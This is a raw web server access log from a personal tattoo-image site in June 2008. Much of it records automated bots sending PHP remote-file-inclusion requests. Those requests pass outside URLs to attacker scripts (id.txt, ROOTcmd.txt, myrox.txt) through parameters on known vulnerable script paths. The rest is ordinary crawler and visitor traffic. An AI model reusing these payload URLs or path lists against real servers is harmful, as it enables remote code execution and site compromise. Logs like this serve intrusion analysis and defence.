209.62.115.202 - - [27/Jun/2008:22:24:00 -0500] "GET /logs/access_log.1207785600//oneadmin/photogallery/include.php?path[docroot]=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:22:24:00 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:22:24:00 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:22:24:29 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:22:24:29 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
64.90.163.98 - - [27/Jun/2008:22:25:11 -0500] "GET /logs/access_log.1207785600//oneadmin/photogallery/include.php?path[docroot]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
64.90.163.98 - - [27/Jun/2008:22:25:11 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
64.90.163.98 - - [27/Jun/2008:22:25:12 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
64.90.163.98 - - [27/Jun/2008:22:25:19 -0500] "GET /logs/access_log.1207785600//oneadmin/photogallery/include.php?path[docroot]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
64.90.163.98 - - [27/Jun/2008:22:25:19 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
64.90.163.98 - - [27/Jun/2008:22:25:19 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
200.76.111.11 - - [27/Jun/2008:22:32:28 -0500] "GET /logs//modules/auth/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
200.76.111.11 - - [27/Jun/2008:22:32:28 -0500] "GET //modules/auth/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
200.76.111.11 - - [27/Jun/2008:22:33:02 -0500] "GET /logs/header.php?set_menu=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
200.76.111.11 - - [27/Jun/2008:22:33:02 -0500] "GET /header.php?set_menu=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
64.38.46.234 - - [27/Jun/2008:22:34:35 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
64.38.46.234 - - [27/Jun/2008:22:34:35 -0500] "GET //appserv/main.php?appserv_root=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
64.38.46.234 - - [27/Jun/2008:22:37:41 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
64.38.46.234 - - [27/Jun/2008:22:37:42 -0500] "GET //appserv/main.php?appserv_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
209.62.115.202 - - [27/Jun/2008:22:48:30 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:22:48:30 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
64.38.46.234 - - [27/Jun/2008:22:49:24 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 306 "-""libwww-perl/5.810"
64.38.46.234 - - [27/Jun/2008:22:49:24 -0500] "GET //appserv/main.php?appserv_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 301 "-""libwww-perl/5.810"
194.30.160.11 - - [27/Jun/2008:23:02:46 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/lostmind7/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
194.30.160.11 - - [27/Jun/2008:23:02:47 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/lostmind7/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
202.53.78.212 - - [27/Jun/2008:23:05:21 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:23:05:22 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
201.245.12.66 - - [27/Jun/2008:23:08:53 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:23:08:54 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.76"
89.208.40.137 - - [27/Jun/2008:23:10:55 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/lostmind7/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
89.208.40.137 - - [27/Jun/2008:23:10:55 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/lostmind7/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
81.149.13.26 - - [27/Jun/2008:23:11:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:23:11:52 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
89.188.110.30 - - [27/Jun/2008:23:12:34 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/lostmind7/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
89.188.110.30 - - [27/Jun/2008:23:12:35 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/lostmind7/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
213.22.158.90 - - [27/Jun/2008:23:16:00 -0500] "GET /logs//modules/auth/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
213.22.158.90 - - [27/Jun/2008:23:16:01 -0500] "GET //modules/auth/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
69.7.34.177 - - [27/Jun/2008:23:16:03 -0500] "GET /logs/access_log.1207785600/?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
69.7.34.177 - - [27/Jun/2008:23:16:08 -0500] "GET /?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
69.7.34.177 - - [27/Jun/2008:23:16:22 -0500] "GET /logs/?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 89217 "-""libwww-perl/5.805"
209.62.115.202 - - [27/Jun/2008:23:19:57 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:23:19:57 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:23:20:30 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:23:20:30 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
219.93.96.46 - - [27/Jun/2008:23:21:19 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
219.93.96.46 - - [27/Jun/2008:23:21:20 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
200.55.206.49 - - [27/Jun/2008:23:24:22 -0500] "GET /logs/access_log.1207785600//modules/My_eGallery/index.php?basepath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.65"
200.55.206.49 - - [27/Jun/2008:23:24:22 -0500] "GET //modules/My_eGallery/index.php?basepath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
200.55.206.49 - - [27/Jun/2008:23:24:23 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
194.30.160.11 - - [27/Jun/2008:23:28:29 -0500] "GET /logs//atom.php5?page=http://h1.ripway.com/lostmind7/ROOTcmd.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
194.30.160.11 - - [27/Jun/2008:23:28:29 -0500] "GET //atom.php5?page=http://h1.ripway.com/lostmind7/ROOTcmd.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
123.100.226.24 - - [27/Jun/2008:23:30:49 -0500] "GET /logs//atom.php5?page=http://h1.ripway.com/lostmind7/ROOTcmd.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
123.100.226.24 - - [27/Jun/2008:23:30:49 -0500] "GET //atom.php5?page=http://h1.ripway.com/lostmind7/ROOTcmd.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.62.115.202 - - [27/Jun/2008:23:33:32 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:23:33:32 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
69.7.34.177 - - [27/Jun/2008:23:40:56 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.7.34.177 - - [27/Jun/2008:23:41:00 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.134.70.32 - - [27/Jun/2008:23:42:01 -0500] "GET /logs/access_log.1207785600/modules/My_eGallery/index.php?basepath=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
220.134.70.32 - - [27/Jun/2008:23:42:01 -0500] "GET /modules/My_eGallery/index.php?basepath=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
220.134.70.32 - - [27/Jun/2008:23:42:02 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.108.67.220 - - [27/Jun/2008:23:45:28 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/lostmind7/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
89.108.67.220 - - [27/Jun/2008:23:45:29 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/lostmind7/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.6.18.227 - - [27/Jun/2008:23:45:56 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.227 - - [27/Jun/2008:23:45:57 -0500] "GET /logs/access_log.1184716800 HTTP/1.0" 200 121523 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.172.161.216 - - [27/Jun/2008:23:52:24 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tnwnepal.org/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
217.172.161.216 - - [27/Jun/2008:23:52:24 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tnwnepal.org/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
211.20.85.150 - - [27/Jun/2008:23:54:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
207.44.236.81 - - [28/Jun/2008:00:04:24 -0500] "GET /logs/errors.php?error=http://207.44.236.81/manual/arab.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.44.236.81 - - [28/Jun/2008:00:04:24 -0500] "GET /errors.php?error=http://207.44.236.81/manual/arab.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
61.222.167.228 - - [28/Jun/2008:00:06:08 -0500] "GET /logs//login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
61.222.167.228 - - [28/Jun/2008:00:06:20 -0500] "GET //login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.29.92.223 - - [28/Jun/2008:00:06:32 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
72.29.92.223 - - [28/Jun/2008:00:06:32 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
217.217.156.113 - - [28/Jun/2008:00:07:18 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.813"
217.217.156.113 - - [28/Jun/2008:00:07:18 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.813"
217.217.156.113 - - [28/Jun/2008:00:07:25 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.813"
217.217.156.113 - - [28/Jun/2008:00:07:26 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.813"
87.242.98.48 - - [28/Jun/2008:00:10:29 -0500] "GET /logs/include/write.php?dir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
87.242.98.48 - - [28/Jun/2008:00:10:29 -0500] "GET /include/write.php?dir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
75.182.73.153 - - [28/Jun/2008:00:20:44 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?q=vintage+tattoos+flash&btnG=Search&hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=8H8&sa=2""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:20:46 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:20:46 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:20:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:20:56 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.29.92.223 - - [28/Jun/2008:00:22:33 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
72.29.92.223 - - [28/Jun/2008:00:22:33 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
75.182.73.153 - - [28/Jun/2008:00:22:41 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:22:44 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:22:45 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:22:46 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:22:47 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:22:47 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:22:48 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:22:49 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:22:49 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:22:50 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:22:50 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:41 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:44 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:46 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:47 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:47 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:47 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:49 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:49 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:50 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:50 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:23:51 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:23 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:25 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:25 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:26 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:27 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:27 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:28 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:28 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:29 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:29 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
75.182.73.153 - - [28/Jun/2008:00:24:29 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
